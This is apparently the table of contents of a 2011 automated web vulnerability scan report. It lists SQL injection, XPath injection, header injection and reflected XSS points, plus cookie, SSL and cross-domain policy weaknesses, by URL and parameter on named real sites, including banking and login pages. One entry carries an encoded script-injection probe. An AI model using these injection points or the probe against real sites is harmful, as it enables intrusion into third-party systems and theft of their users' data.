XSS, SQL Injection, HTTP Response Splitting, DORK, GHDB, Vulnerable Web Server

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Tue May 03 00:19:15 CDT 2011.


Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

Loading

1. SQL injection

1.1. http://bs.serving-sys.com/BurstingPipe/adServer.bs [PluID parameter]

1.2. http://expertsystem.net/page.asp [idd parameter]

1.3. http://googleads.g.doubleclick.net/pagead/ads [num_ads parameter]

1.4. http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi [clicktag parameter]

1.5. http://webshop.elsevier.com/myarticleservices/booklets/ [product_id parameter]

1.6. http://www.ilsole24ore.com/favicon.ico [REST URL parameter 1]

1.7. http://www.ilsole24ore.com/s24service [REST URL parameter 1]

2. XPath injection

2.1. http://www.ansa.it/motori/ [REST URL parameter 1]

2.2. http://www.ansa.it/web/banner_js/ansa_banner_array.js [REST URL parameter 1]

2.3. http://www.ansa.it/web/banner_js/ansa_banner_array.js [REST URL parameter 2]

2.4. http://www.ansa.it/web/banner_js/ansa_banner_array.js [REST URL parameter 3]

2.5. http://www.ansa.it/web/banner_js/msn_banner_array.js [REST URL parameter 1]

2.6. http://www.ansa.it/web/banner_js/msn_banner_array.js [REST URL parameter 2]

2.7. http://www.ansa.it/web/banner_js/msn_banner_array.js [REST URL parameter 3]

2.8. http://www.ansa.it/web/images/favicon.ico [REST URL parameter 1]

2.9. http://www.ansa.it/web/images/favicon.ico [REST URL parameter 2]

2.10. http://www.ansa.it/web/images/favicon.ico [REST URL parameter 3]

2.11. http://www.ansa.it/web/notizie/photogallery/hp_photo_index.xml [REST URL parameter 1]

2.12. http://www.ansa.it/web/notizie/photogallery/hp_photo_index.xml [REST URL parameter 2]

2.13. http://www.ansa.it/web/notizie/photogallery/hp_photo_index.xml [REST URL parameter 3]

3. HTTP header injection

3.1. http://a.tribalfusion.com/h.click/aomOnIT6rp3GUVXUFITPip26BbRmjE4WYr1HrLpdZau5mvS3sM6UsvbWGrePPUmTHMQUrMX5resVqMvVEFdPTvIRcFZdQbuxSt79UVnT4r6nodan0EPp3HjESGjG56JZbpdEoTdZbhXbrjYb7f1TAtPbBDTrM4VHU4nF7vRUrFfZcnUYu/ [name of an arbitrarily supplied request parameter]

3.2. http://d.adroll.com/c/N34ZPOW5TRGMJKDEFHM2G4/U6PZANHGRBHQFBIDRUUZ3E/33IKJE45JFAHDG4ETT36VB [REST URL parameter 2]

3.3. http://go.techtarget.com/activity/activity.gif [REST URL parameter 2]

3.4. http://mfr.247realmedia.com/RealMedia/ads/adstream.cap/123 [c parameter]

3.5. http://mfr.247realmedia.com/RealMedia/ads/adstream.cap/123 [dv parameter]

4. Cross-site scripting (reflected)

4.1. http://api.zanox.com/json/2011-03-01/applications/mediaslot/624BF84E5DF10228E1C8 [callback parameter]

4.2. http://digg.com/submit [REST URL parameter 1]

4.3. http://expertsystem.net/clienti_dettaglio.asp [cd550 parameter]

4.4. http://expertsystem.net/clienti_dettaglio.asp [name of an arbitrarily supplied request parameter]

4.5. http://expertsystem.net/clienti_home.asp [name of an arbitrarily supplied request parameter]

4.6. http://expertsystem.net/demo_prodotti.asp [name of an arbitrarily supplied request parameter]

4.7. http://expertsystem.net/page.asp [name of an arbitrarily supplied request parameter]

4.8. http://expertsystem.net/vetrinanews.asp [name of an arbitrarily supplied request parameter]

4.9. http://finanza-mercati.ilsole24ore.com/quotazioni.php [name of an arbitrarily supplied request parameter]

4.10. http://geoisp.virgilio.it/geo.php [callback parameter]

4.11. http://go.techtarget.com//clicktrack-r/activity/a [REST URL parameter 3]

4.12. http://go.techtarget.com//clicktrack-r/activity/activity.gif [REST URL parameter 3]

4.13. http://go.techtarget.com/activity/activity.gif [REST URL parameter 2]

4.14. http://go.techtarget.com/clicktrack-r/activity/a [REST URL parameter 3]

4.15. http://go.techtarget.com/clicktrack-r/activity/activity.gif [REST URL parameter 3]

4.16. http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi [clicktag parameter]

4.17. http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi [clicktag parameter]

4.18. http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi [name of an arbitrarily supplied request parameter]

4.19. http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi [name of an arbitrarily supplied request parameter]

4.20. http://webshop.elsevier.com/forgotpassword.html [name of an arbitrarily supplied request parameter]

4.21. https://webshop.elsevier.com/login.cfm [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00003C)%3C/script%3E parameter]

4.22. https://webshop.elsevier.com/login.cfm [d46 parameter]

4.23. https://webshop.elsevier.com/login.cfm [name of an arbitrarily supplied request parameter]

4.24. http://www.addthis.com/bookmark.php [REST URL parameter 1]

4.25. http://www.addthis.com/bookmark.php [REST URL parameter 1]

4.26. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

4.27. http://www.camera.it/1 [name of an arbitrarily supplied request parameter]

4.28. http://www.camera.it/1 [name of an arbitrarily supplied request parameter]

4.29. http://www.elsevier.com/wps/find/advproductsearch.cws_home [REST URL parameter 3]

4.30. http://www.elsevier.com/wps/find/advproductsearch.cws_home [REST URL parameter 3]

4.31. http://www.elsevier.com/wps/find/advproductsearch.cws_home [REST URL parameter 3]

4.32. http://www.elsevier.com/wps/find/advproductsearch.cws_home [name of an arbitrarily supplied request parameter]

4.33. http://www.elsevier.com/wps/find/advproductsearch.cws_home [name of an arbitrarily supplied request parameter]

4.34. http://www.elsevier.com/wps/find/subject_area_browse.cws_home [REST URL parameter 3]

4.35. http://www.elsevier.com/wps/find/subject_area_browse.cws_home [REST URL parameter 3]

4.36. http://www.elsevier.com/wps/find/subject_area_browse.cws_home [REST URL parameter 3]

4.37. http://www.elsevier.com/wps/find/subject_area_browse.cws_home [name of an arbitrarily supplied request parameter]

4.38. http://www.elsevier.com/wps/find/subject_area_browse.cws_home [name of an arbitrarily supplied request parameter]

4.39. http://www.eni.com/mobile/page.do [locale parameter]

4.40. http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp [name of an arbitrarily supplied request parameter]

4.41. http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp [name of an arbitrarily supplied request parameter]

4.42. http://www.shopping24.ilsole24ore.com/sh4/catalog/Product.jsp [name of an arbitrarily supplied request parameter]

4.43. https://www.webank.it/ [name of an arbitrarily supplied request parameter]

4.44. https://www.webank.it/webankpub/wb/2l/do/aol/wbwsPUaol0.do [OBS_KEY parameter]

4.45. https://www.webank.it/webankpub/wb/2l/do/aol/wbwsPUaol0.do [OBS_KEY parameter]

4.46. https://www.webank.it/webankpub/wb/2l/do/aol/wbwsPUaol0.do [tabId parameter]

4.47. https://www.webank.it/webankpub/wb/fpServizi.do [OBS_KEY parameter]

4.48. https://www.webank.it/webankpub/wb/fpServizi.do [tabId parameter]

4.49. https://www.webank.it/webankpub/wb/home.do [OBS_KEY parameter]

4.50. https://www.webank.it/webankpub/wb/home.do [tabId parameter]

4.51. http://www.addthis.com/bookmark.php [Referer HTTP header]

4.52. http://www.addthis.com/bookmark.php [Referer HTTP header]

4.53. http://www.addthis.com/bookmark.php [Referer HTTP header]

4.54. http://www.autostrade.it/autostrade/jsonBridge [JSESSIONID cookie]

4.55. https://www.webank.it/webankpub/wb/2l/do/aol/wbwsPUaol0.do [ultimeTrePagine cookie]

4.56. https://www.webank.it/webankpub/wb/fpServizi.do [ultimeTrePagine cookie]

5. Flash cross-domain policy

5.1. http://ad-emea.doubleclick.net/crossdomain.xml

5.2. http://ad78.neodatagroup.com/crossdomain.xml

5.3. http://adlev.neodatagroup.com/crossdomain.xml

5.4. http://bs.serving-sys.com/crossdomain.xml

5.5. http://cdn1.eyewonder.com/crossdomain.xml

5.6. http://cdn4.eyewonder.com/crossdomain.xml

5.7. http://documenti.camera.it/crossdomain.xml

5.8. http://ds.serving-sys.com/crossdomain.xml

5.9. http://elstatic.weborama.fr/crossdomain.xml

5.10. https://eprocurement.eni.it/crossdomain.xml

5.11. http://fls.doubleclick.net/crossdomain.xml

5.12. http://ieo.solution.weborama.fr/crossdomain.xml

5.13. http://media.fastclick.net/crossdomain.xml

5.14. http://metrics.ilsole24ore.com/crossdomain.xml

5.15. http://mfr.247realmedia.com/crossdomain.xml

5.16. http://omniture.virgilio.it/crossdomain.xml

5.17. http://paginebianche.ilsole24ore.com/crossdomain.xml

5.18. http://paginegialle.ilsole24ore.com/crossdomain.xml

5.19. http://secure-it.imrworldwide.com/crossdomain.xml

5.20. http://statse.webtrendslive.com/crossdomain.xml

5.21. http://video.ilsole24ore.com/crossdomain.xml

5.22. http://www.luxury24.ilsole24ore.com/crossdomain.xml

5.23. http://www.motori24.ilsole24ore.com/crossdomain.xml

5.24. http://www.yoox.com/crossdomain.xml

5.25. http://zanox01.webtrekk.net/crossdomain.xml

5.26. http://adimg.alice.it/crossdomain.xml

5.27. http://adv.ilsole24ore.it/crossdomain.xml

5.28. http://answers.yahoo.com/crossdomain.xml

5.29. http://api.bing.com/crossdomain.xml

5.30. http://edition.cnn.com/crossdomain.xml

5.31. http://en.camera.it/crossdomain.xml

5.32. http://finanza-mercati.ilsole24ore.com/crossdomain.xml

5.33. http://friendfeed.com/crossdomain.xml

5.34. http://giochi-tiscali.king.com/crossdomain.xml

5.35. http://it.yahoo.com/crossdomain.xml

5.36. http://itunes.apple.com/crossdomain.xml

5.37. http://nuovo.camera.it/crossdomain.xml

5.38. http://static.ak.fbcdn.net/crossdomain.xml

5.39. https://www.eni.com/crossdomain.xml

5.40. http://imagesdotcom.ilsole24ore.com/crossdomain.xml

5.41. http://job24.ilsole24ore.com/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://ad-emea.doubleclick.net/clientaccesspolicy.xml

6.2. http://ad78.neodatagroup.com/clientaccesspolicy.xml

6.3. http://adlev.neodatagroup.com/clientaccesspolicy.xml

6.4. http://cdn1.eyewonder.com/clientaccesspolicy.xml

6.5. http://elstatic.weborama.fr/clientaccesspolicy.xml

6.6. http://ieo.solution.weborama.fr/clientaccesspolicy.xml

6.7. http://metrics.ilsole24ore.com/clientaccesspolicy.xml

6.8. http://omniture.virgilio.it/clientaccesspolicy.xml

6.9. http://secure-it.imrworldwide.com/clientaccesspolicy.xml

6.10. http://api.bing.com/clientaccesspolicy.xml

7. Cleartext submission of password

7.1. http://cp.mightyblue.com/

7.2. http://cp.mightyblue.com/default.asp

7.3. http://digg.com/submit

7.4. http://du.ilsole24ore.com/utenti/Registrazione.aspx

7.5. http://du.ilsole24ore.com/utenti/facebook_connect.aspx

7.6. http://jsdotcom.ilsole24ore.com/js2010/common.min.js

7.7. http://jsdotcom.ilsole24ore.com/js2010/soleLib.js

7.8. http://pf.rossoalice.alice.it/login.html

7.9. http://www.genialloyd.it/GlfeWeb/area_personale/recupera_password.jsp

7.10. http://www.genialloyd.it/GlfeWeb/gl/it/home.html

7.11. http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp

7.12. http://www.shopping24.ilsole24ore.com/sh4/catalog/Product.jsp

7.13. http://www.shopping24.ilsole24ore.com/sh4/catalog/order/statoOrdine.jsp

7.14. http://www.telecomitalia.it/

8. XML injection

9. Password returned in later response

10. SSL cookie without secure flag set

10.1. https://account.musfiber.com/login.php

10.2. https://areaclienti187.telecomitalia.it/auth/recuperapassword.do

10.3. https://areaclienti187.telecomitalia.it/auth/registrautente.do

10.4. https://areaclienti187.telecomitalia.it/cdas187/d/a/p18485/serv.do

10.5. https://areaclienti187.telecomitalia.it/cdas187/d/a/p21608/serv2.do

10.6. https://areaclienti187.telecomitalia.it/cdas187/d/a/p21618/serv3.do

10.7. https://eprocurement.eni.it/default.asp

10.8. https://secure.mightyblue.com/default.asp

10.9. https://secure.mightyblue.com/default.asp

10.10. https://www.sciencedirect.com/science

10.11. https://www.webank.it/webankpub/wb/2l/do/aol/wbwsPUaol0.do

10.12. https://feedback.live.com/default.aspx

11. Session token in URL

11.1. http://job24.ilsole24ore.com/news/Articoli/2011/04/bertolino-Consumer-Retention-Management-aprile-2011.php

11.2. https://ui.zanox-affiliate.de/bin/z_in_frm.dll

11.3. http://web.progress.com/docs/gated/campaigns/bpm_search3.htm

11.4. http://www.autostrade.it/videoXml/previsioni-videoListSmall-it.xml

11.5. http://www.computerworld.com/s/article/9214732/Semantic_Web_Tools_you_can_use

11.6. http://www.facebook.com/extern/login_status.php

11.7. http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp

11.8. http://www.shopping24.ilsole24ore.com/sh4/catalog/order/statoOrdine.jsp

12. SSL certificate

12.1. https://ads.bluelithium.com/

12.2. https://feedback.live.com/

12.3. https://areaclienti187.telecomitalia.it/

12.4. https://eprocurement.eni.it/

12.5. https://seal.verisign.com/

12.6. https://secure.mightyblue.com/

12.7. https://ui.zanox-affiliate.de/

12.8. https://www.eni.com/

12.9. https://www.webank.it/

13. Password field submitted using GET method

14. Cookie scoped to parent domain

14.1. http://rainbow.mythings.com/pix.aspx

14.2. http://www.capterra.com/

14.3. http://www.capterra.com/business-management-and-analytics-software

14.4. http://www.capterra.com/business-process-management-software

14.5. http://www.house24.ilsole24ore.com/external/showCase/library-luxury24~2.js

14.6. http://www.house24.ilsole24ore.com/vimages/default/logos/house24extCarouselBanner.png

14.7. http://www.sciencedirect.com/science/journal/09574174

14.8. https://www.sciencedirect.com/science

14.9. http://www.yoox.com/scripts/services/dynamicsGalleryService.asp

14.10. http://a.tribalfusion.com/h.click/aomOnIT6rp3GUVXUFITPip26BbRmjE4WYr1HrLpdZau5mvS3sM6UsvbWGrePPUmTHMQUrMX5resVqMvVEFdPTvIRcFZdQbuxSt79UVnT4r6nodan0EPp3HjESGjG56JZbpdEoTdZbhXbrjYb7f1TAtPbBDTrM4VHU4nF7vRUrFfZcnUYu/

14.11. http://a.tribalfusion.com/j.ad

14.12. http://ad.doubleclick.net/adj/N3024.152171.WEBSYSTEM_ILSOLE24O/B5226098

14.13. http://ad.doubleclick.net/adj/els.SDguest/ISSNgeneral

14.14. http://ad78.neodatagroup.com/ad/tiscaliadv.jsp

14.15. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1661065426@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

14.16. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/07/sole5/shopping24/44374678/Top/OasDefault/Experteer_SGR_am_110503/IT_Leaderboard_728x90no_button_copy.gif/61646331643666333464626633303930

14.17. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1301110576/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930

14.18. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1494137922/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930

14.19. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1694123445/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

14.20. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1747038723/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930

14.21. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1747140575/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930

14.22. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1845993609/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930

14.23. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1968511751/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

14.24. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/2007468888/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

14.25. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/220106844/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

14.26. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/482545817/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930

14.27. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/558533179/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930

14.28. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/669678699/VideoBox_2/OasDefault/Experteer_SGR_am_110503/300x250_solo_posizioni_per_dirigenti84894.gif/61646331643666333464626632633930

14.29. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/725179361/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930

14.30. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/741128699/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930

14.31. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/909166720/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

14.32. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1325040199@Top

14.33. http://adv.ilsole24ore.it/RealMedia/ads/click_lx.ads/www.ilsole24ore.it/07/sole5/shopping24/926333658/Top/OasDefault/BancaPopMilano_XGR_am_110502/83881.html/61646331643666333464626632633930

14.34. http://adv.ilsole24ore.it/RealMedia/ads/click_lx.ads/www.ilsole24ore.it/10/_01_000_/_homepage/2007468888/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

14.35. http://answers.yahoo.com/question/index

14.36. http://auth.rossoalice.alice.it/aap/serviceforwarder

14.37. http://bs.serving-sys.com/BurstingPipe/adServer.bs

14.38. http://cdn4.eyewonder.com/cm/tr/17671-124835-21707-7

14.39. http://del.icio.us/post

14.40. http://go.techtarget.com//clicktrack-r/activity/activity.gif

14.41. http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi

14.42. http://it.yahoo.com/add

14.43. http://local.virgilio.it/scripts/jquery.cookie.js

14.44. http://mail.alice.it/

14.45. http://mail.alice.it/common/VIRGILIO/header2008/stili/header_alice.css

14.46. http://mail.alice.it/css/popup.css

14.47. http://mail.alice.it/css/stili.css

14.48. http://mail.alice.it/css/stili_overwrite.css

14.49. http://mail.alice.it/css/stili_stampa.css

14.50. http://mail.alice.it/images/bg_bottombox0.gif

14.51. http://mail.alice.it/images/bg_pop.jpg

14.52. http://mail.alice.it/images/bt_registrati00.gif

14.53. http://mail.alice.it/images/butt_registrati.png

14.54. http://mail.alice.it/images/header/immagine.png

14.55. http://mail.alice.it/images/ico_busta_link.gif

14.56. http://mail.alice.it/images/ico_disc_red.gif

14.57. http://mail.alice.it/images/ico_preferiti.gif

14.58. http://mail.alice.it/images/ico_stampa.gif

14.59. http://mail.alice.it/images/ico_vverde15.gif

14.60. http://mail.alice.it/images/ico_xrosso15.gif

14.61. http://mail.alice.it/js/scriptflash.js

14.62. http://media.fastclick.net/w/tre

14.63. http://metrics.ilsole24ore.com/b/ss/s24onewsprod,s24oglobal/1/H.20.3/s78620203291065

14.64. http://metrics.ilsole24ore.com/b/ss/s24oshoppreprod/1/H.20.3/s76706321355364

14.65. http://omniture.virgilio.it/b/ss/tiecommercepreprod,tivirgilioglobalpreprod/1/H.22.1/s79412251526955

14.66. http://paginebianche.ilsole24ore.com/execute.cgi

14.67. http://pixel.rubiconproject.com/tap.php

14.68. http://search.yahoo.com/bin/search

14.69. http://secure-it.imrworldwide.com/cgi-bin/m

14.70. http://www.bing.com/

15. Cookie without HttpOnly flag set

15.1. https://account.musfiber.com/login.php

15.2. https://areaclienti187.telecomitalia.it/auth/recuperapassword.do

15.3. https://areaclienti187.telecomitalia.it/auth/registrautente.do

15.4. https://areaclienti187.telecomitalia.it/cdas187/d/a/p18485/serv.do

15.5. https://areaclienti187.telecomitalia.it/cdas187/d/a/p21608/serv2.do

15.6. https://areaclienti187.telecomitalia.it/cdas187/d/a/p21618/serv3.do

15.7. http://attiva.ilsole24ore.com/pr_home.jsp

15.8. http://compraonline.mediaworld.it/webapp/wcs/stores/servlet/PartnerVisit

15.9. http://cp.mightyblue.com/

15.10. http://cp.mightyblue.com/forgotPassword.asp

15.11. http://cp.mightyblue.com/forgotPassword.asp

15.12. https://eprocurement.eni.it/default.asp

15.13. http://expertsystem.net/

15.14. http://factbook.eni.com/en

15.15. http://factbook.eni.com/en/home

15.16. http://finanza-mercati.ilsole24ore.com/fcxp

15.17. http://mightyblue.com/

15.18. http://multicard.eni.com/it_en

15.19. http://paginebianche.ilsole24ore.com/execute.cgi

15.20. http://paginegialle.ilsole24ore.com/pgolfe/action

15.21. http://rainbow.mythings.com/pix.aspx

15.22. http://searchcio-midmarket.techtarget.com/definition/expert-system

15.23. http://searchcio.techtarget.com/news/2240030637/CIO-survey-IT-salaries-in-2010-and-how-they-vary-by-industry

15.24. https://secure.mightyblue.com/default.asp

15.25. https://secure.mightyblue.com/default.asp

15.26. http://technology.searchcio-midmarket.com/kw

15.27. http://technorati.com/faves

15.28. http://webshop.elsevier.com/specialissues/

15.29. http://websystem.ilsole24ore.com/jsp/Experteer_SGR_qi_100617_img.jsp

15.30. http://websystem.ilsole24ore.com/jsp/Guidaffari_SHW_qi_090114_img.jsp

15.31. http://websystem.ilsole24ore.com/jsp/PortaleAutomob_SGR_qi_081104_HTMGIF.jsp

15.32. http://www.applications.sciverse.com/action/appDetail/292639

15.33. http://www.autostrade.it/autostrade/isMobile.do

15.34. http://www.capterra.com/

15.35. http://www.capterra.com/business-management-and-analytics-software

15.36. http://www.capterra.com/business-process-management-software

15.37. http://www.casa.it/vendita

15.38. http://www.elsevier.com/wps/find/advproductsearch.cws_home

15.39. http://www.elsevier.com/wps/find/journaldescription.cws_home/939/description

15.40. http://www.elsevier.com/wps/find/subject_area_browse.cws_home

15.41. http://www.eni.com/login/LoginServletOSSO

15.42. http://www.eni.com/mobile/page.do

15.43. http://www.genialloyd.it/GlfeWeb/do/processHomePage

15.44. http://www.genialloyd.it/GlfeWeb/genialloyd/css_min/common.css

15.45. http://www.genialloyd.it/GlfeWeb/gl/it/home.html

15.46. http://www.genialloyd.it/GlfeWeb/js_min/mootools-more.js

15.47. http://www.genialloyd.it/GlfeWeb/js_min/mootools.js

15.48. http://www.house24.ilsole24ore.com/external/showCase/library-luxury24~2.js

15.49. http://www.house24.ilsole24ore.com/vimages/default/logos/house24extCarouselBanner.png

15.50. http://www.luxury24.ilsole24ore.com/common/counter.php

15.51. http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp

15.52. http://www.telepass.it/AutostradeETIWeb/immagineSpazio

15.53. https://www.webank.it/webankpub/wb/2l/do/aol/wbwsPUaol0.do

15.54. http://www.yoox.com/scripts/services/dynamicsGalleryService.asp

15.55. http://a.tribalfusion.com/h.click/aomOnIT6rp3GUVXUFITPip26BbRmjE4WYr1HrLpdZau5mvS3sM6UsvbWGrePPUmTHMQUrMX5resVqMvVEFdPTvIRcFZdQbuxSt79UVnT4r6nodan0EPp3HjESGjG56JZbpdEoTdZbhXbrjYb7f1TAtPbBDTrM4VHU4nF7vRUrFfZcnUYu/

15.56. http://a.tribalfusion.com/j.ad

15.57. http://ad.doubleclick.net/adj/N3024.152171.WEBSYSTEM_ILSOLE24O/B5226098

15.58. http://ad.doubleclick.net/adj/els.SDguest/ISSNgeneral

15.59. http://ad.yieldmanager.com/pixel

15.60. http://ad78.neodatagroup.com/ad/tiscaliadv.jsp

15.61. http://adv.ilsole24ore.it/4/www.ilsole24ore.it/10/_01_000_/_homepage/1661065426@BackGround,Top,VideoBox,VideoBox_2,VideoBox_3,MaxTicker_01,MaxTicker_02,StripMenu_01,Right3,SpotLight_01,SpotLight_02,SpotLight_03,TextBox_01,TextBox_02,TextBox_03,TextBox_04,TextBox_05,TextBox_06,LittleBox_01,LittleBox_02,LittleBox_03,PopUp,PopUnder

15.62. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/07/sole5/shopping24/44374678/Top/OasDefault/Experteer_SGR_am_110503/IT_Leaderboard_728x90no_button_copy.gif/61646331643666333464626633303930

15.63. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1301110576/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930

15.64. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1494137922/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930

15.65. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1694123445/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

15.66. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1747038723/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930

15.67. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1747140575/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930

15.68. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1845993609/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930

15.69. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/1968511751/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

15.70. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/2007468888/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

15.71. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/220106844/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

15.72. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/482545817/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930

15.73. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/558533179/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930

15.74. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/669678699/VideoBox_2/OasDefault/Experteer_SGR_am_110503/300x250_solo_posizioni_per_dirigenti84894.gif/61646331643666333464626632633930

15.75. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/725179361/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565617221575299.html/61646331643666333464626632633930

15.76. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/741128699/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere5656157298585327312875048.html/61646331643666333464626632633930

15.77. http://adv.ilsole24ore.it/5/www.ilsole24ore.it/10/_01_000_/_homepage/909166720/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

15.78. http://adv.ilsole24ore.it/RealMedia/ads/adstream_jx.ads/www.ilsole24ore.it/07/sole5/shopping24/1325040199@Top

15.79. http://adv.ilsole24ore.it/RealMedia/ads/click_lx.ads/www.ilsole24ore.it/07/sole5/shopping24/926333658/Top/OasDefault/BancaPopMilano_XGR_am_110502/83881.html/61646331643666333464626632633930

15.80. http://adv.ilsole24ore.it/RealMedia/ads/click_lx.ads/www.ilsole24ore.it/10/_01_000_/_homepage/2007468888/TextBox_03/OasDefault/Publiscoop_SHW_textbox_2009_4/textbox_piu_salute_benessere565255656065156.html/61646331643666333464626632633930

15.81. http://answers.yahoo.com/question/index

15.82. http://assicurazione-auto.ansa.it/

